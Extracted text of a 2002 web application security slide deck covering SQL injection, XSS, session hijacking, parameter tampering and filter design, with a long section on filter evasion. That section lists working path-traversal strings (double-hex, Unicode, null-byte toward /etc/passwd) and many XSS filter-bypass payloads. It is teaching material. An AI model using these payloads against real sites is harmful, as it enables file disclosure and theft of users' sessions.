Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Taking Aim at Web Applications Dennis Groves Bill Pennington.

Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman

Taking Aimat Web Applications

Dennis Groves

Bill Pennington


2

Introduction

Bill PenningtonPrincipal Consultant, Guardent

Tested over 300 web applications of the past 3 years


3

Dennis Groves

Specialty: Enterprise Security, Web Application Security, Pen-Testing & Quality Assurance.Bio: Dennis is currently the Director of Internet Security Consulting for Centerstance, Inc. For the last 3 years his primary focus has been on Web Application Security. He is a founding member of the Open Web Application Project and a former Sanctum employee, he played a key role in the development of AppScan.


4

Why is this important?


5

Topics

This is not new

Why your firewall doesn’t matter

Types of attacks

Filter, Filter, Filter

Do you know where your data is?

Tools to help you


6

This is Not New

Problems with web applications are the same problems with standalone applications


7

Why your Firewall doesn’t matter

Standard rant


8

Top 5 Vulnerabilities

SQL insertion

XSS

Session Hijacking

Parameter manipulation

Unbounded file calls


9

Cross site scripting, Why you should care.

XSS is not an attack on the server, it is an attack on the users of your application

So what?Identity theft

User masquerading

Reputation Risk


10

SQL Insertion

Most common on MS based applications.

All SQL apps are vulnerable (Oracle, Sybase, DB2…)

Can lead to full compromise of the server (xp_cmdshell)

Almost guarantied to lead to data compromise

Demo…


11

Cross Site Scripting (XSS)

Found in 98% of applications I test

2 main typesTransient (URL basedP

http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>

Sticky – Script placed in a static bit of web content


12

XSS continued…

Transient generally requires user interaction

What can happen?Possibilities are only restricted by the client

Cookie theft most common example

But I filter “<“ and “>”Jscript entities “&{alert(‘Test')};”


13

Session Hijacking

HTTP is stateless so application designers must build a way to track state

Cookies and URL strings are the most common ways to track state

Both are easily exploitable


14

Session Hijacking continued…

Generally the next thing to occur after XSS

Please people logout means logout!

Examples of common session tracking issues


15

Parameter Tampering

Programmers will store data anywhere!URL parameters http://badapp.com/checkout.pl?p=$1.00

Cookies – Cookie:p=$1.00

Hidden fields – not really hidden


16

Unbound File Calls

Ye Ole’ ../../

Watch out you don’t display important information (global.asa)

Most application languages will take URL’s as file arguments


17

Do you know where your data is?

Building an exclusionary filter is difficult because your data is all over the place


18

Data Flow example


19

Designing a proper filter

Make all filters default denyDon’t try to exclude “bad stuff”

Try to get a good idea where your data is going

Log all filter violations


20

Examples

ASP

PHP

Jscript

Perl


Bypassing poorly designed filters

All warfare is based on deception…If he is in superior strength, evade him.

–Sun Tzu, The Art of War, 500BC


22

Evasion is the art of blending in so you will not be noticed; of course this age old

technique of survival is still useful today.evade

1. to escape or avoid somebody or something, usually by ingenuity or guile

2. to avoid doing something unpleasant, especially something that is a moral or legal obligation

3. to avoid dealing with or responding directly to something

4. to be difficult or impossible for somebody to find, obtain, or achieve (formal)


23

Filter Bypassing is a technique to evade detection by filtering systems.

Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.


24

Most filter systems are very simple as the flow chart shows.

Seven forms of ingenuity:URL Encoded Strings

Double Hex Encoding

Unicode Encoded String

Long URLs

Case Sensitivity

XSS Filter-Bypass Manipulation

Null Character Injection

Evade: 1. to escape or avoid somebody or something, usually by ingenuity or guile…


25

The Hex Advantage

By URL hex encoding URL strings, it may be possible

circumvent filter security systems and IDS.

http://foo.com/cgi?file=/etc/passwd

Can become:

http://foo.com/cgi?file=/%2F%65%74%63

%2F%70%61%73%73%77%64


26

Double Hex Encoding

In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.

The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.

An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.

When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.

IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.

This secondary decoding was the source of another Vulnerability.


27

IIS Double HexRound 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)

Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through Double Hex Encoding.


28

The Unicode Slash

In unicode, “%c0%af”, is the equivilent to a slash (“/”).

Therefore the common URL IIS exploit:scripts/..%c0%af../winnt

becomes:scripts/../../winnt

Once again, directory path traversal is now possible using path obfuscation through Unicode.


29

Double Slash

Double Slash using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd.

Can be used to move under the radar of IDS systems and still function properly.


30

Many system put limits on how much data a variable can store or a system can handle.

Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations.URL’s such as:http://www.foo.com/cgi?param=filename

Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>

Long URL’s


31

Case Sensitivity

Case sensitivity may play a roll in many security filtration systems.Alternating case on URL parameters may be used to bypass certain restrictions.

http://foo.com/cgi?param=barhttp://foo.com/cgi?param=BaRhttp://foo.com/CGI?param=BAR


32

Method Switching

Many web applications do not properly perform HTTP Request Method sanity checking.

Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.

Most web servers do not log "POST" data and thus forensic analysis is harder to perform.

The Request Method: GET /cgi-bin/some.cgi

can become: POST /cgi-bin/some.cgi


33

The Method token indicates the method to be performed on the resource identified by the Request-URI.

HTTP 1.1 Methods

OPTIONSGETHEADPOST PUTDELETETRACECONNECT


34

Using your “HEAD”

The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.

Scans and web application attacks can be made to be more effective using this technique.


35

Null Character Injection

Hex encoded null characters can be used to thwart some security mechanisms.

This happens because in the “C” programming language, a null character designates the end of a string.

So If a CGI appending a “.html” to an input parameter:

http://foo.com/cgi?file=../../etc/passwd%00

Will cut off appending “.html”.


36

Unicode (UTF-8) Encoded

Unicode is a universal way to represent characters.

However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.

Microsoft IIS has had security issues in the past while supporting unicode.


37

URL Encoded String

The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:

"...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."


38

XSS Filter-Bypass Manipulation

This technique is used pass various types of client-side scripting language through implemented security filters.

The idea is to be able to achieve client-side execution of a client-side script.

There are several techniques used to perform this attack.


39

Test the Filters

Submit all the raw HTML tags you can find, and then view the output results.Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.


40

SRCing the protocol

Using the “javascript” protocol in an HTML source attribute.

<IMG SRC="javascript:js_expression">

<IMG SRC="javascript:alert('test');">


41

Alternate Protocol SRCing

Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect.

<IMG SRC=“livescript:js_expression">

<IMG SRC=“mocha:alert('test');">


42

Decimal HTML Entities

Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.

<IMG SRC=“java
script:js_expression">

\09 \10 \11 \12 \13 have all been seen to work


43

Hex HTML Entities

Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript.

<IMG SRC=“java&#X0A;script:js_expression">


44

Padding HTML Entities

Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.

<IMG SRC=“java script:js_expression">


45

STYLE JavaScript Type

Changing the MIME-TYPE on a “style” tag may be used to execute JavaScript.

<style TYPE="text/javascript">JS EXPRESSION</style>

<style TYPE="text/javascript">Alert(document.domain);</style>


46

STYLE JavaScript X-Type

Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.

<STYLE TYPE="application/x-javascript">

alert('JavaScript has been Executed');

</STYLE>


47

STYLE JavaScript Import

Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.

<style TYPE="text/css">

@import url(javascript:alert('Javascript is executed'));

</style>


48

STYLE URL Import

Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.

<STYLE type=text/css>

@import url(http://www.test.com);

</STYLE>


49

LINK Style Sheet

The “LINK” tag can be used to import JavaScript from a remote HTTP resource.

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">


50

Style Left Expression

A few CSS features used together to execute JavaScript.

<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >


51

Remote SRCing

A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.

<LAYER SRC="js.html"></LAYER>

<LAYER SRC="js.html"></LAYER>


52

AND CURLY

<IMG SRC="&{javascript_expression};">

<IMG SRC="&{alert(‘alert’)};">

Syntax must be exact.


53

Dangerous HTML Tags

“All HTML is to be considered dangerous, but these tags are the most insidious.”

<APPLET><BODY><EMBED><FRAME><FRAMESET><HTML><IFRAME><IMG><LAYER><ILAYER><META><OBJECT><SCRIPT><STYLE>


54

Dangerous HTML Attributes

(HTML Tags with these attributes.)SRC

LOWSRC

STYLE

HREF


55

Why automated tools don’t work very well

Every programmer does things a little differentAuthentication schemes are hard to automateError codes are not standardizedSometimes simple things like SSL get in the waySome good things:

CompletenessLarge knowledge bases (at least possibly)


56

Why people are better

Recognition of subtle errors

We understand the impact and therefore the risk of a vulnerability

We can find “real” bugs, flaws in logic


57

One tool to rule them all…


58

Conclusion


59

Questions

Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Taking Aim at Web Applications Dennis Groves Bill Pennington.

Documents

dennis groves specialty

bc slide

exploitable slide

place slide

formal slide

standard rant slide

data compromise demo

filter bypassing